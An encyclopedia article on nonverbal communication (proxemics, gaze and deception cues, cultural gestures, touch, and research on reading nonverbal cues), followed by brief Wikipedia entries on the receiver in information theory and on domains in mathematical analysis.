According to Edward T. Hall, the amount of space we maintain between ourselves and the persons with whom we are communicating shows the importance of the science of proxemics; this spacing reveals how we feel towards the others at that particular time.[49] Within American culture Hall defines four primary distance zones: (i) intimate (touching to eighteen inches [0–46 centimetres]) distance, (ii) personal (eighteen inches to four feet [0.46–1.22 metres]) distance, (iii) social (four to twelve feet [1.22–3.66 metres]) distance, and (iv) public (more than twelve feet [3.66 metres]) distance. Intimate distance is considered appropriate for familiar relationships and indicates closeness and trust. Personal distance is still close but keeps another "at arm's length" and is considered the most comfortable distance for most of our interpersonal contact, while social distance is used for the kind of communication that occurs in business relationships and, sometimes, in the classroom. Public distance occurs in situations where two-way communication is not desirable or possible.[49]
Proxemics plays a crucial role in getting to know someone.[50] Imagine two individuals sitting at a small dinner table. One person, motivated by romantic interest, begins to lean in, lightly touching the other’s arm and shifting their chair closer. They are operating within the intimate zone, expecting closeness. However, the other person, who does not share the same romantic feelings, perceives this behavior as a breach of social norms. They expected the interaction to remain within personal distance, a more appropriate zone for acquaintances or casual dates. As a result, they may respond by pulling away, crossing their arms, or showing visible discomfort, signals of a desire to re-establish that personal boundary.
In addition to social expectations, culture can play a role in proxemics. People from different cultures have different comfort zones when it comes to personal space (Chen & Starosta, 2005).[51] In everyday conversations, people from places like North Africa and parts of the Middle East usually feel fine standing closer to others. On the other hand, people from Japan and China often prefer more space between themselves and others. Not understanding these differences can make cross-cultural interactions feel awkward or uncomfortable.[52] For example, someone from a culture that’s used to standing close might keep moving forward if the other person keeps stepping back. Meanwhile, someone who’s used to more space might feel uneasy or confused if someone stands too close.
Eye contact is the instance when two people look at each other's eyes at the same time; it is the primary nonverbal way of indicating engagement, interest, attention and involvement. Nonverbal communication involves the conscious and unconscious processes of encoding and decoding. Encoding is defined as our ability to express emotions in a way that the receiver(s) can accurately interpret; it is the act of generating information such as facial expressions, gestures, and postures. Decoding, called "nonverbal sensitivity", is the ability to take this encoded emotion and interpret its meaning accurately as the sender intended. Some studies have demonstrated that people use their eyes to indicate interest. This includes frequently recognized actions of winking and movements of the eyebrows.[53] Disinterest is highly noticeable when little or no eye contact is made in a social setting. When an individual is interested, however, the pupils will dilate.
According to Eckman, "Eye contact (also called mutual gaze) is another major channel of nonverbal communication. The duration of eye contact is its most meaningful aspect."[54] Generally speaking, the longer there is established eye contact between two people, the greater the intimacy levels.[6] Gaze comprises the actions of looking while talking and listening. The length of a gaze, the frequency of glances, patterns of fixation, pupil dilation, and blink rate are all important cues in nonverbal communication.[55] According to Descroix et al., the context of conversations does not produce long blinks between the emitter and the recipient. "Liking generally increases as mutual gazing increases."[6]
Along with the detection of disinterest, deceit can also be observed in a person. Hogan states, "when someone is being deceptive their eyes tend to blink a lot more. Eyes act as leading indicator of truth or deception."[6] Both nonverbal and verbal cues are useful when detecting deception. It is typical for people who are detecting lies to rely consistently on verbal cues, but this can hinder how well they detect deception. Those who are lying and those who are telling the truth possess different forms of nonverbal and verbal cues, and this is important to keep in mind. It is also important to note that understanding the cultural background of a person will influence how easily deception is detectable, because nonverbal cues may differ depending on the culture. In addition to eye contact, these nonverbal cues can consist of physiological aspects including pulse rate as well as levels of perspiration.[20] Eye aversion, the avoidance of eye contact, can also be predictive of deception. Eye contact and facial expressions provide important social and emotional information. Overall, as Pease states, "Give the amount of eye contact that makes everyone feel comfortable. Unless looking at others is a cultural no-no, lookers gain more credibility than non-lookers."[10]
In concealing deception, nonverbal communication makes it easier to lie without being revealed. This is the conclusion of a study where people watched made-up interviews of persons accused of having stolen a wallet. The interviewees lied in about 50% of the cases. People had access to either written transcripts of the interviews, or audio tape recordings, or video recordings. The more clues that were available to those watching, the larger was the trend that interviewees who actually lied were judged to be truthful. That is, people who are clever at lying can use tone of voice and facial expressions to give the impression that they are truthful.[56] Contrary to popular belief, a liar does not always avoid eye contact. In an attempt to be more convincing, liars deliberately made more eye contact with interviewers than those who were telling the truth.[57][58] However, there are many cited examples of cues to deceit, delivered via nonverbal (paraverbal and visual) communication channels, through which deceivers supposedly unwittingly provide clues to their concealed knowledge or actual opinions.[59] Most studies examining the nonverbal cues to deceit rely upon human coding of video footage (c.f. Vrij, 2008[60]), although a recent study also demonstrated bodily movement differences between truth-tellers and liars using an automated body motion capture system.[61]
Olfactic communication is a channel of nonverbal communication referring to the various ways people and animals communicate and engage in social interaction through their sense of smell. The human olfactory sense is one of the most phylogenetically primitive[62] and emotionally intimate[63] of the five senses; the sensation of smell is thought to be the most matured and developed human sense.
Nonverbal communication stands in contrast to communication through words, but includes other aspects of the speech signal. In particular, prosody, and especially vocalics, plays a very important part in nonverbal communication. Prosodic properties such as tempo, volume, inflection, pauses, and pitch can combine to communicate emotion and attitude without using specific words. Vocalics also includes emblems, or sounds with specific meanings, like saying “brrr” when you are cold or “hmm” when you are thinking about something.[66] These are not specific words, but noises that further convey a person’s message. These sounds are often accompanied by other nonverbal cues.
Infants heavily rely on nonverbal vocalics to communicate their needs. As caregivers talk with their baby, the baby can pick up intonation as well as start to mimic and use it themselves.[66] As they grow, babies can pick up more and learn how to develop their own voices and vocalics.
Furthermore, a study highlighted by Pearce and Conklin found that changing the vocalics of an audio recording of the same speech produced different ratings of liking. When the speaker delivered his speech in a more conversational rather than dynamic style, he was deemed more trustworthy.[67]
Vocalics can heavily influence communication through its many different cues.
While not traditionally thought of as "talk," nonverbal communication has been found to contain highly precise and symbolic meanings, similar to verbal speech. However, the meanings in nonverbal communication are conveyed through the use of gesture, posture changes, and timing.[68] Nuances across different aspects of nonverbal communication can be found in cultures all around the world. These differences can often lead to miscommunication between people of different cultures, who usually do not mean to offend. Differences can be based in preferences for mode of communication, like the Chinese, who prefer silence over verbal communication.[69]: 69 Differences can even be based on how cultures perceive the passage of time. Chronemics, how people handle time, can be categorized in two ways: polychronic, which is when people do many activities at once and is common in Italy and Spain, or monochronic, which is when people do one thing at a time and is common in America.[70]: 422 Because nonverbal communication can vary across many axes—gestures, gaze, clothing, posture, direction, or even environmental cues like lighting—there is a lot of room for cultural differences.[71]: 8 In Japan, a country which prides itself on the best customer service, workers tend to use wide arm gestures to give clear directions to strangers—accompanied by the ever-present bow to indicate respect. One of the main factors that differentiates nonverbal communication in cultures is high versus low context. Context relates to certain events and the meaning that is ultimately derived from them.[72] "High-context" cultures rely mostly on nonverbal cues and gestures, drawing on elements such as the closeness of their relationships with others, strict social hierarchies and classes, and deep cultural traditions and widely known beliefs and rules.
In contrast, "low-context" cultures depend largely on words and verbal communication; communication is direct, and social hierarchies are far less rigid.
Gestures vary widely across cultures in how they are used and what they mean. A common example is pointing. In the United States, pointing with a finger or hand is used to indicate something, or to beckon (as with "come here please" when calling a dog). But pointing with one finger is also considered to be rude by some cultures. Those from Asian cultures typically use their entire hand to point to something.[73] Other examples include sticking your tongue out. In Western countries, it can be seen as mockery, but in Polynesia it serves as a greeting and a sign of reverence.[70]: 417 Clapping is a North American way of applauding, but in Spain it is used to summon a waiter at a restaurant. Differences in nodding and shaking the head to indicate agreement and disagreement also exist. Northern Europeans nod their heads up and down to say "yes", and shake their heads from side to side to say "no", but the Greeks have for at least three thousand years used the upward nod for disagreement and the downward nod for agreement.[70]: 417 There are many ways of waving goodbye: Americans face the palm outward and move the hand side to side, Italians face the palm inward and move the fingers facing the other person, French and Germans face the hand horizontal and move the fingers toward the person leaving.[70]: 417 Also, it is important to note that gestures are used in more informal settings and more often by children.[70]: 417 People in the United States commonly use the "OK" hand gesture[72] to give permission and allow an action. In Japan, however, the same sign means "money". It refers to "zero" or "nothing" in several cultures besides these two (Argentina, Belgium, France, and Portugal). To Eastern European cultures that same "OK" sign is considered a vulgar swearing gesture.
In certain Commonwealth cultures, the index and middle fingers only extended with the palm pointing outwards can be an insulting gesture, while in others it simply means the number "two" or the "V for Victory" sign, while the same sign with the palm pointing inwards means "peace" in some cultures.
Speech-independent gestures are nonverbal cues that communicate a word or an expression, most commonly a dictionary definition.[74] Although there are differences in nonverbal gestures across cultures, speech-independent gestures must have an agreed-upon interpretation among people affiliated with that culture or subculture.[74] While most humans use gestures to better clarify their speech, speech-independent gestures do not rely on speech for their meaning. Usually they consist of a single gesture.[74]
Many speech-independent gestures are made with the hand; the "ring" gesture usually comes across as asking someone if they are okay.[74] Several can be performed through the face. For example, a nose wrinkle could universally mean disapproval or disgust.[74] Nodding the head up and down or shaking it side to side indicates understanding, or the lack of it, while the speaker is talking. Although speech-independent gestures do not need actual speech to be understood, they still need context.[74] Raising the middle finger is a gesture that could be used within different contexts. It could be comical or derogatory. The only way to know is to analyze the other behaviors surrounding it, depending on who the speaker is and whom the speaker is addressing.[74]
Emotions are a key factor in nonverbal communication. Just as gestures and other hand movements vary across cultures, so does the way people display their emotions. For example, "In many cultures, such as the Arab and Iranian cultures, people express grief openly. They mourn out loud, while in Asian cultures, the general belief is that it is unacceptable to show emotion openly."[75] For people in Westernized countries, laughter is a sign of amusement, but in some parts of Africa it is a sign of wonder or embarrassment.[70]: 417 Emotional expression varies with culture.[76] Native Americans tend to be more reserved and less expressive with emotions.[77]: 44 Frequent touches are common for Chinese people; however, such actions like touching, patting, hugging or kissing in America are less frequent and not often publicly displayed.[69]: 68 According to Rebecca Bernstein (from Point Park University), "Winking is a facial expression particularly varied in meaning." In Latin culture, a wink is a display or invitation of romantic pursuit. The Yoruba (Nigeria) have taught their children to follow certain nonverbal commands, such as winking, which tells them it is time to leave the room. To the Chinese it comes off as an offensive gesture.[72]
According to Matsumoto and Juang, the nonverbal motions of different people indicate important channels of communication. Nonverbal actions should match and harmonize with the message being portrayed, otherwise confusion will occur.[18] For instance, an individual would normally not be seen smiling and gesturing broadly when saying a sad message. The author states that nonverbal communication is very important to be aware of, especially if comparing gestures, gaze, and tone of voice amongst different cultures. As Latin American cultures embrace big speech gestures, Middle Eastern cultures are relatively more modest in public and are not expressive. Within cultures, different rules are made about staring or gazing. Women may especially avoid eye contact with men because it can be taken as a sign of sexual interest.[73] In some cultures, gaze can be seen as a sign of respect. In Western culture, eye contact is interpreted as attentiveness and honesty. In Hispanic, Asian, Middle Eastern, and Native American cultures, eye contact is thought to be disrespectful or rude, and lack of eye contact does not mean that a person is not paying attention. Voice is a category that changes within cultures. Depending on whether the culture is expressive or non-expressive, many variants of the voice can depict different reactions.[78]
The acceptable physical distance is another major difference in the nonverbal communication between cultures. In Latin America and the Middle East the acceptable distance is much shorter than what most Europeans and Americans feel comfortable with. This is why an American or a European might wonder why the other person is invading their personal space by standing so close, while the other person might wonder why the American/European is standing so far from them.[79] In addition, for Latin Americans, the French, Italians, and Arabs the distance between people is much closer than the distance for Americans; in general for these close distance groups, 1 foot of distance is for lovers, 1.5–4 feet of distance is for family and friends, and 4–12 feet is for strangers.[70]: 421 In the opposite way, most Native Americans value distance to protect themselves.[77]: 43
Nonverbal communication is commonly used to facilitate learning in indigenous American communities. Nonverbal communication is pivotal for collaborative participation in shared activities, as children from indigenous American communities will learn how to interact using nonverbal communication by intently observing adults.[68] Nonverbal communication allows for continuous keen observation and signals to the learner when participation is needed. Culture plays an important role in nonverbal communication, and it is one aspect that helps to influence how learning activities are organized. In many Indigenous American communities, for example, there is often an emphasis on nonverbal communication, which acts as a valued means by which children learn.[80] In one study, children from both US Mexican (with presumed indigenous backgrounds) and European American heritages watched a video of children working together without speaking; the Mexican-heritage children were far more likely to describe the children's actions as collaborative, saying that the children in the video were "talking with their hands and with their eyes."[81]
A key characteristic of this type of nonverbal learning is that children have the opportunity to observe and interact with all parts of an activity.[82]Many Indigenous American children are in close contact with adults and other children who are performing the activities that they will eventually master. Objects and materials become familiar to the child as the activities are a normal part of everyday life. Learning is done in an extremely contextualized environment rather than one specifically tailored to be instructional.[82]For example, the direct involvement that Mazahua children take in the marketplace is used as a type of interactional organization for learning without explicit verbal instruction. Children learn how to run a market stall, take part in caregiving, and also learn other basic responsibilities through non-structured activities, cooperating voluntarily within a motivational context to participate. Not explicitly instructing or guiding the children teaches them how to integrate into small coordinated groups to solve a problem through consensus and shared space.[82]These Mazahua separate-but-together practices have shown that participation in everyday interaction and later learning activities establishes enculturation that is rooted in nonverbal social experience.[82]As the children participate in everyday interactions, they are simultaneously learning the cultural meanings behind these interactions. Children's experience with nonverbally organized social interaction helps constitute the process ofenculturation.[82]
In some Indigenous communities of the Americas, children reported one of their main reasons for working in their home was to build unity within the family, the same way they desire to build solidarity within their own communities.[83] Most indigenous children learn the importance of putting in this work in the form of nonverbal communication. Evidence of this can be observed in a case study where children are guided through the task of folding a paper figure by observing the posture and gaze of those who guide them through it.[84] This is projected onto homes and communities, as children wait for certain cues from others before initiating cooperation and collaboration.
One aspect of nonverbal communication that aids in conveying these precise and symbolic meanings is "context-embeddedness": many children in Indigenous American communities are closely involved in community endeavors, both spatially and relationally, which helps to promote nonverbal communication, given that words are not always necessary. When children are closely related to the context of the endeavor as active participants, coordination is based on a shared reference, which helps to allow, maintain, and promote nonverbal communication.[85] The idea of "context-embeddedness" allows nonverbal communication to be a means of learning within Native American Alaskan Athabaskan and Cherokee communities. By observing various family and community social interactions, social engagement is dominated by nonverbal communication. For example, when children elicit thoughts or words verbally to their elders, they are expected to structure their speech carefully; excessive acts of speech and shifts in conversational genre reveal weakness and disrespect, so this restraint demonstrates cultural humility and respect. This careful self-censorship exemplifies the traditional social interaction of Athabaskan and Cherokee Native Americans, who are mostly dependent on nonverbal communication.[86]
Nonverbal cues are used by most children in the Warm Springs Indian Reservation community within the parameters of their academic learning environments. This includes referencing Native American religion through stylized hand gestures in colloquial communication, verbal and nonverbal emotional self-containment, and less movement of the lower face to structure attention on the eyes during face-to-face engagement. Therefore, children's approach to social situations within a reservation classroom, for example, may act as a barrier to a predominantly verbal learning environment. Most Warm Springs children benefit from a learning model that suits a nonverbal communicative structure of collaboration, traditional gesture, observational learning and shared references.[87]
It is important to note that while nonverbal communication is more prevalent in Indigenous American communities, verbal communication is also used. Ideally, verbal communication does not substitute for one's involvement in an activity, but instead acts as additional guidance or support towards the completion of the activity.[68]
As much of human communication is nonverbal, learning a language without learning its corresponding pragmatics can lead to miscommunication.[88] "This can lead to intercultural conflict (according to Marianna Pogosyan Ph.D.), misunderstandings and ambiguities in communication, despite language fluency."[88] Nonverbal communication can make the difference between bringing cultures together in mutual understanding and authenticity, or pushing people farther apart through misunderstandings about how different groups interpret certain nonverbal cues or gestures. From birth, children in various cultures are taught the gestures and cues their culture defines as universal, which is not the case for other cultures, though some movements are universal.[89] Evidence suggests that humans all smile when happy about something and frown when something is upsetting or bad.[89]
"In the study of nonverbal communications, the limbic brain is where the action is...because it is the part of the brain that reacts to the world around us reflexively and instantaneously, in real time, and without thought."[47] There is evidence that the nonverbal cues made from person to person do not entirely depend on the environment.[10]
Along with gestures, phenotypic traits can also convey certain messages in nonverbal communication, for instance, eye color, hair color and height. Research into height has generally found that taller people are perceived as being more impressive. Melamed and Bozionelos (1992) studied a sample of managers in the United Kingdom and found that height was a key factor in who was promoted. Height can have benefits and drawbacks too. "While tall people often command more respect than short people, height can also be detrimental to some aspects of one-to-one communication, for instance, where you need to 'talk on the same level' or have an 'eye-to-eye' discussion with another person and do not want to be perceived as too big for your boots."[10]
Chronemics is the way time is used. Our use of time can communicate and send messages, nonverbally. The way we use time and give or do not give our time to others can communicate different messages. Chronemics can send messages to others about what we value and also send messages about power. "When you go to see someone who is in a position of power over you, such as your supervisor, it is not uncommon to be kept waiting. However, you would probably consider it bad form to make a more powerful person wait for you. Indeed, the rule seems to be that the time of powerful people is more valuable than the time of less powerful people."[90]
Nonverbal communication plays a crucial role in effectively transmitting messages. Beginning from birth and persisting throughout one's life, it undergoes a developmental progression encompassing three phases, ranging from initial dyadic exchanges to the integration of both verbal and nonverbal cues. With diverse functions, nonverbal communication acts as a substitute for verbal interaction in situations where verbalization is unnecessary or impossible. It adds clarity to communication by unveiling emotional states and articulating specific feelings. This is achieved through various nonverbal elements such as emblems, illustrators, regulators, adaptors, and vocalics. This system is shaped by components including paralinguistics, kinesics, tactile communication, and proxemics, influencing social, academic, and professional contexts.[91] Despite frequently being overlooked, nonverbal cues possess the potential to convey up to 80% of a message, especially holding significance in interactions involving prelinguistic infants and individuals who have severe disabilities.[91] The cultural nuances of these cues underscore the necessity for interpretation, emphasizing the contextual, signaling, and interpretative dimensions.
Kinesics is defined as movements, more specifically the study of movements involving the hands, body, and face. The term was coined by Ray Birdwhistell, who considered the term body language inaccurate and instead opted to explain it as nonverbal behaviors stemming from body movement. Research around this behavior provides some examples, such as someone casually smiling, leaning forward, and maintaining eye contact to radiate a non-dominating and intimate demeanor. In contrast, leaning back, a stoic facial expression, and little to no eye contact could convey an unfriendly and dominating demeanor.[92]
Additional research shows that eye contact is an important part of nonverbal communication involved in kinesics, as longer and appropriate levels of eye contact give an individual credibility. The opposite is true for those who do not maintain eye contact, as they are likely to be deemed distrustful. More eye contact was also found to be related to higher levels of likability and believability from those with whom people interacted. A real-life example involves service workers: one study found that workers who welcomed customers with smiles seemed like warmer individuals than those who did not smile. Customers reported that those without smiles and open body movements, such as waving or handshaking, were lacking warmth and deemed less friendly.[92]
Haptics is the study of touching as nonverbal communication, and haptic communication refers to how people and other animals communicate via touching.
Touches among humans that can be defined as communication include handshakes, holding hands, kissing (cheek, lips, hand), back slapping, high fives, a pat on the shoulder, and brushing an arm. Touching of oneself may include licking, picking, holding, and scratching.[33]: 9These behaviors are referred to as "adapters" or "tells" and may send messages that reveal the intentions or feelings of a communicator and a listener. The meaning conveyed from touch is highly dependent upon the culture, the context of the situation, the relationship between communicators, and the manner of touch.[33]: 10
Touch is an extremely important sense for humans; as well as providing information about surfaces and textures it is a component of nonverbal communication in interpersonal relationships, and vital in conveying physical intimacy. It can be both sexual (such as kissing) and platonic (such as hugging or tickling).
Touch is the earliest sense to develop in the fetus. Human babies have been observed to have enormous difficulty surviving if they do not possess a sense of touch, even if they retain sight and hearing.[93]Babies who can perceive through touch, even without sight and hearing, tend to fare much better.
In chimpanzees, the sense of touch is highly developed. As newborns, they see and hear poorly but cling strongly to their mothers. Harry Harlow conducted a controversial study involving rhesus monkeys and observed that monkeys reared with a "terry cloth mother", a wire feeding apparatus wrapped in soft terry cloth that provided a level of tactile stimulation and comfort, were considerably more emotionally stable as adults than those reared with a mere wire mother (Harlow, 1958).
Touching is treated differently from one country to another, and socially acceptable levels of touching vary from one culture to another (Remland, 2009). In Thai culture, for example, touching someone's head may be considered rude. Remland and Jones (1995) studied groups of people communicating and found that touching was rare among the English (8%), the French (5%) and the Dutch (4%) compared to Italians (14%) and Greeks (12.5%).[94]Striking, pushing, pulling, pinching, kicking, strangling and hand-to-hand fighting are forms of touch in the context of physical abuse. In the Journal of Nonverbal Behavior, McDaniel et al. assessed touch as a form of communication among people from different nations under the lens of culture, relationships, and the number of body areas touched. Latin Americans are known to have a high degree of tactile activity, in contrast to Asians, who are considered a no-contact culture as they often steer away from public displays of affection (PDA).
Proxemics is defined as the use of space as a form of communication, and includes how far or near you position yourself from others; it can be influenced by culture, race/ethnicity, gender, and age. Edward T. Hall coined the term when he realized, while working with diplomats, that culture influences how people use space in communication, and published his findings on proxemics in 1959 as The Silent Language.[49]Proxemics also plays a big role in business, as research shows that gender and invasion of customers' privacy without previous ties negatively affect the outcome of deals.[95]In high-contact cultures, people are generally comfortable in closer proximity, whereas individuals in low-contact cultures feel more comfortable with a greater amount of personal space. Hall concluded that proxemics could cause misunderstandings between cultures, as cultures' use of proxemics varies and what is customary in one culture may range from confusing to offensive to members of a different culture.[96]
According to Edward T. Hall, the amount of space we maintain between ourselves and the persons we communicate with shows the importance of the science of proxemics: it reveals how we feel towards others at that particular time. Viewed through a cultural lens, people use space differently because the meaning behind it differs across cultures and ideologies.[97]Within American culture, Hall defines four primary distance zones: (i) intimate (touching to eighteen inches) distance, (ii) personal (eighteen inches to four feet) distance, (iii) social (four to twelve feet) distance, and (iv) public (more than twelve feet) distance.
Intimate space is any distance less than 18 inches, and is most commonly used by individuals when they are engaging with someone with whom they feel very comfortable, such as a spouse, partner, friend, child, or parent. Personal space is a distance of 18 inches to 4 feet and is usually used when individuals are interacting with friends. Social distance is the most common type of proximity, as it is used when communicating with colleagues, classmates, acquaintances, or strangers. Public distance creates the greatest gap between the individual and the audience; it is categorized as distances greater than 12 feet and is often used for speeches, lectures, or formal occasions.[98]
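Hall's four zones amount to a simple threshold classification. The sketch below expresses them in code; the function name and the choice of feet as the unit are illustrative assumptions, with the thresholds taken from the figures above.

```python
def hall_zone(distance_ft):
    """Classify an interpersonal distance (in feet) into Hall's four proxemic zones."""
    if distance_ft < 1.5:       # under 18 inches
        return "intimate"
    elif distance_ft < 4:       # 18 inches to 4 feet
        return "personal"
    elif distance_ft <= 12:     # 4 to 12 feet
        return "social"
    else:                       # beyond 12 feet
        return "public"
```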
When communicating face-to-face, it is sometimes hard to differentiate which parts of a conversation are communicated verbally and which nonverbally.[99]Studies of more relaxed and natural communication settings have concluded that verbal and nonverbal signals and cues can contribute in surprisingly similar ways.[100]Argyle,[28]using video tapes shown to subjects, analysed the communication of submissive/dominant attitude (high-context communicators, adhering to stricter social hierarchies, take a short and quick response route to portray dominance; low-context communicators take time to explain everything, placing great importance on communication and on building trust and respect in a submissive, relaxed manner),[101]and found that non-verbal cues had 4.3 times the effect of verbal cues. The most important effect was that body posture communicated superior status (specific to the culture and context in which a person grew up) in a very efficient way. On the other hand, a study by Hsee et al.[102]had subjects judge a person on the dimension happy/sad and found that words spoken with minimal variation in intonation had an impact about 4 times larger than facial expressions seen in a film without sound. Thus, nonverbal mannerisms such as facial expressions and physical cues can conflict in meaning with spoken language and emotions, and different setups and scenarios yield different responses and meanings when both types of communication are used. In other ways they can complement each other, provided they are used together wisely during a conversation.[28]
When seeking to communicate effectively, it is important that the nonverbal conversation supports the verbal conversation, and vice versa. If the nonverbal cues converge with what we are saying verbally, then our message is further reinforced.[103]Mindfulness is one technique that can help improve our awareness of NVC. If we become more mindful and present to how our body is moving, then we can better control our external nonverbal communication, which results in more effective communication.[104]
During communication, nonverbal messages can interact with verbal messages in six ways: repeating, conflicting, complementing, substituting, regulating and accenting/moderating.
Verbal and nonverbal messages within the same interaction can sometimes send opposing or conflicting signals. A person verbally expressing a statement of truth while simultaneously fidgeting or avoiding eye contact may convey a mixed message to the receiver in the interaction. Conflicting messages may occur for a variety of reasons, often stemming from feelings of uncertainty, ambivalence, or frustration. When mixed messages occur, nonverbal communication becomes the primary tool people use to attain additional information to clarify the situation; great attention is placed on bodily movements and positioning when people perceive mixed messages during interactions. Definitions of nonverbal communication create a limited picture in our minds, but there are ways to create a clearer one. Several dimensions of verbal and nonverbal communication have been identified: (1) structure versus non-structure, (2) linguistic versus non-linguistic, (3) continuous versus discontinuous, (4) learned versus innate, and (5) left versus right hemispheric processing.[105]: 7
Accurate interpretation of messages is made easier when nonverbal and verbal communication complement each other. Nonverbal cues can be used to elaborate on verbal messages to reinforce the information sent when trying to achieve communicative goals; messages have been shown to be remembered better when nonverbal signals affirm the verbal exchange.[33]: 14
Nonverbal behavior is sometimes used as the sole channel for communication of a message. People learn to identify facial expressions, body movements, and body positioning as corresponding with specific feelings and intentions. Nonverbal signals can be used without verbal communication to convey messages; when nonverbal behavior does not effectively communicate a message, verbal methods are used to enhance understanding.[33]: 16
Verbal communication is a highly structured form of communication with set rules of grammar. The rules of verbal communication help to understand and make sense of what other people are saying. For example, foreigners learning a new language can have a hard time making themselves understood. On the other hand, nonverbal communication has no formal structure when it comes to communicating. Nonverbal communication occurs without even thinking about it. The same behavior can mean different things, such as crying of sadness or of joy. Therefore, these cues need to be interpreted carefully to get their correct meaning.[105]: 7–8
There are only a few assigned symbols in the system of nonverbal communication. Nodding the head is one symbol that indicates agreement in some cultures, but in others, it means disagreement. On the other hand, verbal communication has a system of symbols that have specific meanings to them.[105]: 8
Verbal communication is based on discontinuous units whereas nonverbal communication is continuous. Communicating nonverbally cannot be stopped unless one leaves the room, but even then, intrapersonal processes still take place (individuals communicating with themselves). Without the presence of someone else, the body still manages to undergo nonverbal communication. For example, there are no other words being spoken after a heated debate, but there are still angry faces and cold stares being distributed. This is an example of how nonverbal communication is continuous.[105]: 8
Learned non-verbal cues require a community or culture for their reinforcement. For example, table manners are not innate capabilities upon birth. Dress code is a non-verbal cue that must be established by society. Hand symbols, whose interpretation can vary from culture to culture, are not innate nonverbal cues. Learned cues must be gradually reinforced by admonition or positive feedback.
Innate non-verbal cues are "built-in" features of human behavior. Generally, these innate cues are universally prevalent, regardless of culture. For example, smiling, crying, and laughing do not require teaching. Similarly, some body positions, such as the fetal position, are universally associated with weakness. Due to their universality, the ability to comprehend these cues is not limited to individual cultures.[105]: 9
This type of processing involves the neurophysiological approach to nonverbal communication. It explains that the right hemisphere processes nonverbal stimuli such as those involving spatial, pictorial, and gestalt tasks while the left hemisphere involves the verbal stimuli involving analytical and reasoning tasks. It is important to know the implications in processing the differences between verbal and nonverbal communication messages. It is possible that individuals may not use the correct hemisphere at appropriate times when it comes to interpreting a message or meaning.[105]: 9
From 1977 to 2004, the influence of disease and drugs on receptivity of nonverbal communication was studied by teams at three separate medical schools using a similar paradigm.[106]Researchers at the University of Pittsburgh, Yale University and Ohio State University had subjects observe gamblers at a slot machine awaiting payoffs. The amount of this payoff was read by nonverbal transmission prior to reinforcement. This technique was developed, and the studies directed, by psychologist Robert E. Miller and psychiatrist A. James Giannini. These groups reported diminished receptive ability in heroin addicts[107]and phencyclidine abusers,[108]contrasted with increased receptivity in cocaine addicts. Men with major depression[109]manifested significantly decreased ability to read nonverbal cues when compared with euthymic men.
In some subjects tested for ability to read nonverbal cues, intuitive paradigms were apparently employed while in others a cause and effect approach was used.[110]Subjects in the former group answered quickly and before reinforcement occurred. They could not give a rationale for their particular responses. Subjects in the latter category delayed their response and could offer reasons for their choice. The level of accuracy between the two groups did not vary nor did handedness.[111]
Obese women[112]and women with premenstrual syndrome[113]were found to also possess diminished abilities to read these cues. In contradistinction, men with bipolar disorder possessed increased abilities.[114]A woman with total paralysis of the nerves of facial expression was found unable to transmit or receive any nonverbal facial cues whatsoever.[115]Because of these changes in levels of accuracy of nonverbal receptivity, the members of the research team hypothesized a biochemical site in the brain which was operative for reception of nonverbal cues. Because certain drugs enhanced ability while others diminished it, the neurotransmitters dopamine and endorphin were considered likely etiological candidates. Based on the available data, however, the primary cause and primary effect could not be sorted out on the basis of the paradigm employed.[116]
An increased emphasis on gestures exists when intonations or facial expressions are used. "Speakers often anticipate how recipients will interpret their utterances. If they wish some other, less obvious interpretation, they may "mark" their utterance (e.g. with special intonations or facial expressions)."[117]This specific emphasis, known as 'marking', can be spotted as a learned form of non-verbal communication in toddlers. A groundbreaking study from Carpenter et al. in the Journal of Child Language concluded that the act of marking a gesture is recognized by three-year-olds but not by two-year-olds.
In the study, two and three-year-old toddlers were tested on their recognition of markedness within gestures. The experiment was conducted in a room with an examiner and the test subjects, which for the first study were three-year-olds. The examiner sat across from each child individually, and allowed them to play with various objects including a purse with a sponge in it and a box with a sponge in it. After allowing the child to play with the objects for three minutes, the examiner told the child it was time to clean up and motioned by pointing to the objects. They measured the responses of the children by first pointing and not marking the gesture, to see the child's reaction to the request and if they reached for the objects to clean them up. After observing the child's response, the examiner then asked and pointed again, marking the gesture with facial expression, as to lead the child to believe the objects were supposed to be cleaned up. The results showed that three-year-old children were able to recognize the markedness, by responding to the gesture and cleaning the objects up as opposed to when the gesture was presented without being marked.
In the second study, in which the same experiment was performed on two-year-olds, the results were different. For the most part, the children did not recognize the difference between the marked and unmarked gesture, not responding more prevalently to the marked gesture, unlike the three-year-olds. This shows that this sort of nonverbal communication is learned at a young age and is better recognized in three-year-old children than in two-year-old children, suggesting that the ability to recognize markedness is learned in the early stages of development, somewhere between two and three years of age.
Boone and Cunningham conducted a study[118]to determine at which age children begin to recognize emotional meaning (happiness, sadness, anger and fear) in expressive body movements. The study included 29 adults and 79 children divided into age groups of four-, five- and eight-year-olds. The children were shown two clips simultaneously and were asked to point to the one that was expressing the target emotion. The results of the study revealed that of the four emotions being tested the 4-year-olds were only able to correctly identify sadness at a rate that was better than chance. The 5-year-olds performed better and were able to identify happiness, sadness and fear at better than chance levels. The 8-year-olds and adults could correctly identify all four emotions and there was very little difference between the scores of the two groups. Between the ages of 4 and 8, nonverbal communication and decoding skills improve dramatically.
A byproduct of the work of the Pittsburgh/Yale/Ohio State team was an investigation of the role of nonverbal facial cues in heterosexual nondate rape. Males who were serial rapists of adult women were studied for nonverbal receptive abilities. Their scores were the highest of any subgroup.[119]Rape victims were next tested. It was reported that women who had been raped on at least two occasions by different perpetrators had a highly significant impairment in their abilities to read these cues in either male or female senders.[120]These results were troubling, indicating a predator-prey model. The authors did note that whatever the nature of these preliminary findings the responsibility of the rapist was in no manner or level diminished.
The final target of study for this group was the medical students they taught. Medical students at Ohio State University, Ohio University and Northeast Ohio Medical College were invited to serve as subjects. Students indicating a preference for the specialties of family practice, psychiatry, pediatrics and obstetrics-gynecology achieved significantly higher levels of accuracy than those students who planned to train as surgeons, radiologists, or pathologists. Internal medicine and plastic surgery candidates scored at levels near the mean.[121]
|
https://en.wikipedia.org/wiki/Nonverbal_communication
|
The receiver in information theory is the receiving end of a communication channel. It receives decoded messages/information from the sender, who first encoded them.[1]Sometimes the receiver is modeled so as to include the decoder. Real-world receivers like radio receivers or telephones cannot be expected to receive as much information as predicted by the noisy channel coding theorem.
|
https://en.wikipedia.org/wiki/Receiver_(Information_Theory)
|
In mathematical analysis, a domain or region is a non-empty, connected, and open set in a topological space. In particular, it is any non-empty connected open subset of the real coordinate space Rn or the complex coordinate space Cn. A connected open subset of coordinate space is frequently used for the domain of a function.[1]
